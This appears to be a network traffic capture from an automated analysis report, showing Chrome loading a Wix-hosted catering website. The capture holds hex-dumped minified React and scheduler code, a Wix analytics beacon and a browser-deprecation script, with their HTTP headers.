                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 29 7b 63 61 73 65 20 79 3a 63 61 73 65 20 71 61 3a 68 3d 21 30 7d 7d 69 66 28 68 29 72 65 74 75 72 6e 20 68 3d 61 2c 64 3d 64 28 68 29 2c 61 3d 22 22 3d 3d 3d 6d 3f 22 2e 22 2b 0a 4e 28 68 2c 30 29 3a 6d 2c 63 61 28 64 29 3f 28 65 3d 22 22 2c 6e 75 6c 6c 21 3d 61 26 26 28 65 3d 61 2e 72 65 70 6c 61 63 65 28 64 61 2c 22 24 26 2f 22 29 2b 22 2f 22 29 2c 42 28 64 2c 62 2c 65 2c 22 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 29 29 3a 6e 75 6c 6c 21 3d 64 26 26 28 4d 28 64 29 26 26 28 64 3d 6f 61 28 64 2c 65 2b 28 21 64 2e 6b 65 79 7c 7c 68 26 26 68 2e 6b 65 79 3d 3d 3d 64 2e 6b 65 79 3f 22 22 3a 28 22 22 2b 64 2e 6b 65 79 29 2e 72 65 70 6c 61 63 65 28 64 61 2c 22 24 26 2f 22 29 2b 22 2f 22 29 2b 61 29 29 2c 62 2e 70 75 73 68 28 64 29
                                                                                                                                                                                                                        Data Ascii: ){case y:case qa:h=!0}}if(h)return h=a,d=d(h),a=""===m?"."+N(h,0):m,ca(d)?(e="",null!=a&&(e=a.replace(da,"$&/")+"/"),B(d,b,e,"",function(a){return a})):null!=d&&(M(d)&&(d=oa(d,e+(!d.key||h&&h.key===d.key?"":(""+d.key).replace(da,"$&/")+"/")+a)),b.push(d)
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 61 3a 66 6f 72 28 76 61 72 20 63 3d 30 2c 64 3d 61 2e 6c 65 6e 67 74 68 2c 6b 3d 64 3e 3e 3e 31 3b 63 3c 6b 3b 29 7b 76 61 72 20 68 3d 32 2a 28 63 2b 31 29 2d 31 2c 6c 3d 61 5b 68 5d 2c 66 3d 68 2b 31 2c 67 3d 61 5b 66 5d 3b 69 66 28 30 3e 44 28 6c 2c 65 29 29 66 3c 64 26 26 30 3e 44 28 67 2c 6c 29 3f 28 61 5b 63 5d 3d 67 2c 61 5b 66 5d 3d 65 2c 63 3d 66 29 3a 28 61 5b 63 5d 3d 6c 2c 61 5b 68 5d 3d 65 2c 63 3d 68 29 3b 65 6c 73 65 20 69 66 28 66 3c 64 26 26 30 3e 44 28 67 2c 65 29 29 61 5b 63 5d 3d 67 2c 61 5b 66 5d 3d 65 2c 63 3d 66 3b 65 6c 73 65 20 62 72 65 61 6b 20 61 7d 7d 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 44 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 73 6f 72 74 49 6e 64 65 78 2d 62 2e 73 6f 72 74 49 6e 64 65 78 3b 72 65 74 75
                                                                                                                                                                                                                        Data Ascii: a:for(var c=0,d=a.length,k=d>>>1;c<k;){var h=2*(c+1)-1,l=a[h],f=h+1,g=a[f];if(0>D(l,e))f<d&&0>D(g,l)?(a[c]=g,a[f]=e,c=f):(a[c]=l,a[h]=e,c=h);else if(f<d&&0>D(g,e))a[c]=g,a[f]=e,c=f;else break a}}return b}function D(a,b){var c=a.sortIndex-b.sortIndex;retu
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 72 64 5f 72 65 66 22 29 2c 79 61 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 73 75 73 70 65 6e 73 65 22 29 2c 7a 61 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6d 65 6d 6f 22 29 2c 41 61 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6c 61 7a 79 22 29 2c 56 3d 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 2c 58 3d 7b 69 73 4d 6f 75 6e 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 2c 65 6e 71 75 65 75 65 46 6f 72 63 65 55 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 7d 2c 65 6e 71 75 65 75 65 52 65 70 6c 61 63 65 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 6d 29 7b 7d 2c 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62
                                                                                                                                                                                                                        Data Ascii: rd_ref"),ya=Symbol.for("react.suspense"),za=Symbol.for("react.memo"),Aa=Symbol.for("react.lazy"),V=Symbol.iterator,X={isMounted:function(a){return!1},enqueueForceUpdate:function(a,b,c){},enqueueReplaceState:function(a,b,c,m){},enqueueSetState:function(a,b
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 26 26 76 6f 69 64 20 30 21 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 2e 69 73 49 6e 70 75 74 50 65 6e 64 69 6e 67 26 26 6e 61 76 69 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 2e 69 73 49 6e 70 75 74 50 65 6e 64 69 6e 67 2e 62 69 6e 64 28 6e 61 76 69 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 29 3b 76 61 72 20 48 3d 21 31 2c 47 3d 6e 75 6c 6c 2c 41 3d 2d 31 2c 69 61 3d 35 2c 68 61 3d 2d 31 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 47 29 7b 76 61 72 20 61 3d 76 28 29 3b 68 61 3d 61 3b 76 61 72 20 62 3d 21 30 3b 74 72 79 7b 62 3d 47 28 21 30 2c 61 29 7d 66 69 6e 61 6c 6c 79 7b 62 3f 49 28 29 3a 28 48 3d 21 31 2c 47 3d 6e 75 6c 6c 29 7d 7d 65 6c 73
                                                                                                                                                                                                                        Data Ascii: gator.scheduling&&void 0!==navigator.scheduling.isInputPending&&navigator.scheduling.isInputPending.bind(navigator.scheduling);var H=!1,G=null,A=-1,ia=5,ha=-1,U=function(){if(null!==G){var a=v();ha=a;var b=!0;try{b=G(!0,a)}finally{b?I():(H=!1,G=null)}}els
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 2e 73 6f 72 74 49 6e 64 65 78 3d 64 2c 4f 28 71 2c 61 29 2c 75 7c 7c 46 7c 7c 28 75 3d 21 30 2c 52 28 53 29 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 75 6e 73 74 61 62 6c 65 5f 63 61 6e 63 65 6c 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 63 61 6c 6c 62 61 63 6b 3d 6e 75 6c 6c 7d 2c 75 6e 73 74 61 62 6c 65 5f 77 72 61 70 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 0a 6b 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 6b 3b 6b 3d 62 3b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 69 6e 61 6c 6c 79 7b 6b 3d 63 7d 7d 7d 2c 75 6e 73 74 61 62 6c 65 5f 67 65 74 43 75 72 72 65 6e 74 50 72 69 6f 72 69 74 79 4c 65 76
                                                                                                                                                                                                                        Data Ascii: .sortIndex=d,O(q,a),u||F||(u=!0,R(S)));return a},unstable_cancelCallback:function(a){a.callback=null},unstable_wrapCallback:function(a){var b=k;return function(){var c=k;k=b;try{return a.apply(this,arguments)}finally{k=c}}},unstable_getCurrentPriorityLev
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 7d 2c 61 2e 70 72 6f 70 73 29 2c 64 3d 61 2e 6b 65 79 2c 6b 3d 61 2e 72 65 66 2c 68 3d 61 2e 5f 6f 77 6e 65 72 3b 69 66 28 6e 75 6c 6c 21 3d 62 29 7b 76 6f 69 64 20 30 21 3d 3d 62 2e 72 65 66 26 26 28 6b 3d 62 2e 72 65 66 2c 68 3d 4c 2e 63 75 72 72 65 6e 74 29 3b 76 6f 69 64 20 30 21 3d 3d 62 2e 6b 65 79 26 26 28 64 3d 22 22 2b 62 2e 6b 65 79 29 3b 69 66 28 61 2e 74 79 70 65 26 26 61 2e 74 79 70 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 29 76 61 72 20 6c 3d 61 2e 74 79 70 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3b 66 6f 72 28 66 20 69 6e 20 62 29 61 61 2e 63 61 6c 6c 28 62 2c 66 29 26 26 21 62 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 66 29 26 26 28 65 5b 66 5d 3d 76 6f 69 64 20 30 3d 3d 3d 62 5b 66 5d 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c
                                                                                                                                                                                                                        Data Ascii: },a.props),d=a.key,k=a.ref,h=a._owner;if(null!=b){void 0!==b.ref&&(k=b.ref,h=L.current);void 0!==b.key&&(d=""+b.key);if(a.type&&a.type.defaultProps)var l=a.type.defaultProps;for(f in b)aa.call(b,f)&&!ba.hasOwnProperty(f)&&(e[f]=void 0===b[f]&&void 0!==l?l
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC704INData Raw: 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 45 66 66 65 63 74 28 61 2c 62 29 7d 3b 63 2e 75 73 65 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 49 64 28 29 7d 3b 63 2e 75 73 65 49 6d 70 65 72 61 74 69 76 65 48 61 6e 64 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 49 6d 70 65 72 61 74 69 76 65 48 61 6e 64 6c 65 28 61 2c 62 2c 63 29 7d 3b 63 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 28 61 2c 62 29 7d 3b 63 2e 75 73 65 4c 61 79 6f 75 74 45 66 66 65 63 74 3d 66
                                                                                                                                                                                                                        Data Ascii: turn g.current.useEffect(a,b)};c.useId=function(){return g.current.useId()};c.useImperativeHandle=function(a,b,c){return g.current.useImperativeHandle(a,b,c)};c.useInsertionEffect=function(a,b){return g.current.useInsertionEffect(a,b)};c.useLayoutEffect=f


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        27192.168.2.5497473.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1068OUTPOST /bt?src=29&evid=3&viewer_name=thunderbolt&caching=hit,hit_miss&dc=virginia-pub&microPop=fastly_virginia-pub_g&et=12&event_name=Partially%20visible&is_cached=true&is_platform_loaded=0&is_rollout=1&ism=1&isp=0&isjp=false&iss=1&ita=1&msid=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&pn=1&sessionId=609f0441-2d8c-4646-846e-278b54a8f519&siterev=11-__siteCacheRevision__&st=2&ts=1892&tts=3434&url=https%3A%2F%2Fwww.samantacatering.com%2F&v=1.15031.0&vsi=4d6f889a-d75d-4216-a25e-a2eb4ad3a234&_brandId=wix HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:38 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        28192.168.2.54975034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC409OUTGET /services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1112INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 6088
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: r5KsEMc4UqEWV12sOpQE8YncXuR2Pv0W
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 89376019 822346485
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 01:59:23 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 820395
                                                                                                                                                                                                                        Last-Modified: Wed, 01 Jan 2025 01:08:34 GMT
                                                                                                                                                                                                                        ETag: "0022d406fbbd37299590c9dfcb9e8438"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC278INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 2f 2f 20 73 72 63 2f 72 65 70 6f 72 74 50 68 61 73 65 53 74 61 72 74 65 64 2e 74 73 0a 76 61 72 20 5f 77 69 6e 64 6f 77 3d 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 75 75 69 64 76 34 28 29 7b 72 65 74 75 72 6e 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 72 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 36 7c 30 2c 76 3d 63 3d 3d 3d 22 78 22 3f 72 3a 72 26 33 7c 38 3b 72 65 74 75 72 6e 20 76 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 42 49 28 65 76 69 64 29 7b 76 61
                                                                                                                                                                                                                        Data Ascii: "use strict";(function(){// src/reportPhaseStarted.tsvar _window=window;function uuidv4(){return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(c){var r=Math.random()*16|0,v=c==="x"?r:r&3|8;return v.toString(16)})}function sendBI(evid){va
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 3b 76 61 72 20 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 3d 5f 77 69 6e 64 6f 77 2e 66 65 64 6f 70 73 2e 64 61 74 61 2c 73 69 74 65 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 73 69 74 65 2c 72 6f 6c 6c 6f 75 74 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 72 6f 6c 6c 6f 75 74 2c 66 6c 65 65 74 43 6f 6e 66 69 67 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 66 6c 65 65 74 43 6f 6e 66 69 67 2c 72 65 71 75 65 73 74 55 72 6c 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 72 65 71 75 65 73 74 55 72 6c 2c 66 72 6f 67 4f 6e 55 73 65 72 44 6f 6d
                                                                                                                                                                                                                        Data Ascii: h>1&&arguments[1]!==undefined?arguments[1]:"";var _window$fedops$data=_window.fedops.data,site=_window$fedops$data.site,rollout=_window$fedops$data.rollout,fleetConfig=_window$fedops$data.fleetConfig,requestUrl=_window$fedops$data.requestUrl,frogOnUserDom
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 2d 74 73 3b 73 65 6e 64 42 49 28 65 76 69 64 2c 22 26 6e 61 6d 65 3d 22 2e 63 6f 6e 63 61 74 28 70 68 61 73 65 2c 22 26 64 75 72 61 74 69 6f 6e 3d 22 29 2e 63 6f 6e 63 61 74 28 64 75 72 61 74 69 6f 6e 29 2e 63 6f 6e 63 61 74 28 65 78 74 72 61 3f 22 26 22 2b 65 78 74 72 61 3a 22 22 29 29 7d 2f 2f 20 73 72 63 2f 62 72 6f 77 73 65 72 2d 64 65 70 72 65 63 61 74 69 6f 6e 2e 74 73 0a 76 61 72 20 76 65 72 73 69 6f 6e 3d 22 76 35 22 3b 76 61 72 20 5f 77 69 6e 64 6f 77 32 3d 77 69 6e 64 6f 77 3b 76 61 72 20 5f 61 2c 5f 62 2c 5f 63 3b 76 61 72 20 75 73 65 72 41 67 65 6e 74 3d 28 28 5f 63 3d 28 5f 62 3d 28 5f 61 3d 5f 77 69 6e 64 6f 77 32 2e 6e 61 76 69 67 61 74 6f 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 5f 61 2e 75 73 65 72 41 67 65 6e 74 29 3d 3d 6e 75 6c
                                                                                                                                                                                                                        Data Ascii: -ts;sendBI(evid,"&name=".concat(phase,"&duration=").concat(duration).concat(extra?"&"+extra:""))}// src/browser-deprecation.tsvar version="v5";var _window2=window;var _a,_b,_c;var userAgent=((_c=(_b=(_a=_window2.navigator)==null?void 0:_a.userAgent)==nul
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 79 53 74 61 74 65 43 68 61 6e 67 65 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3d 3d 3d 22 63 6f 6d 70 6c 65 74 65 22 29 7b 72 75 6e 44 65 70 72 65 63 61 74 69 6f 6e 46 6c 6f 77 28 29 7d 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 75 6e 44 65 70 72 65 63 61 74 69 6f 6e 46 6c 6f 77 28 29 7b 63 6c 65 61 72 44 6f 6d 46 72 6f 6d 53 53 52 28 29 3b 73 68 6f 77 44 65 70 72 65 63 61 74 69 6f 6e 4d 65 73 73 61 67 65 28 29 3b 72 65 70 6f 72 74 42 49 28 29 7d 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 42 6f 64 79 28 29 7b 76 61 72 20 68 65 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 76 61 72 20 73 74 79 6c 65
                                                                                                                                                                                                                        Data Ascii: yStateChange(){if(document.readyState==="complete"){runDeprecationFlow()}})}}function runDeprecationFlow(){clearDomFromSSR();showDeprecationMessage();reportBI()}function hideBody(){var head=document.head||document.getElementsByTagName("head")[0];var style
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 22 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 22 69 6e 20 77 69 6e 64 6f 77 2c 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 3a 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 2c 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3a 22 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 2c 73 75 70 70 6f 72 74 73 43 73 73 56 61 72 73 3a 73 75 70 70 6f 72 74 73 43 73 73 56 61 72 73 28 29 2c 73 75 70 70 6f 72 74 73 43 73 73 47 72 69 64 3a 73 75 70 70 6f 72 74 73 43 73 73 47 72 69 64 28 29 2c 73 75 70 70 6f 72 74 73 45 53 32 30 31 37 3a 73 75 70 70 6f 72 74 73 45 53 32 30 31 37 28 29 2c 69 73 49 45 3a 69 73 49 45 7d 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65
                                                                                                                                                                                                                        Data Ascii: "customElements"in window,IntersectionObserver:"IntersectionObserver"in window,ResizeObserver:"ResizeObserver"in window,supportsCssVars:supportsCssVars(),supportsCssGrid:supportsCssGrid(),supportsES2017:supportsES2017(),isIE:isIE}}catch(e){console.error(e
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC250INData Raw: 62 3a 20 32 2c 7d 22 29 3b 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 63 6f 6e 73 74 20 61 72 72 57 69 74 68 54 72 61 69 6c 69 6e 67 43 6f 6d 6d 61 20 3d 20 5b 31 2c 32 2c 33 2c 5d 22 29 3b 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 7b 7d 29 3b 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 7b 7d 29 3b 22 78 22 2e 70 61 64 53 74 61 72 74 28 33 2c 22 41 22 29 2e 70 61 64 45 6e 64 28 35 2c 22 42 22 29 3b 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 7b 61 3a 31 2c 62 3a 32 7d 2c 22 61 22 29 3b 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 5b 5b 22 61 22 2c 31 5d 5d 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 72 65 74 75 72 6e 20 74 72 75 65 7d 7d 29 28 29 3b
                                                                                                                                                                                                                        Data Ascii: b: 2,}");new Function("const arrWithTrailingComma = [1,2,3,]");Object.entries({});Object.values({});"x".padStart(3,"A").padEnd(5,"B");Object.getOwnPropertyDescriptor({a:1,b:2},"a");Object.fromEntries([["a",1]])}catch(e){return false}return true}})();


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        29192.168.2.54974934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC650OUTGET /services/wix-thunderbolt/dist/thunderbolt-components-registry.b89104dd.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1141
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: LKvjPnU0bkkSbtqFu6u8QJgNG3KemjO_
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 290530502 255745150
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 977677272
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:26 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274152
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:12 GMT
                                                                                                                                                                                                                        ETag: "24211dda55c887de6746abce758ff45f"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
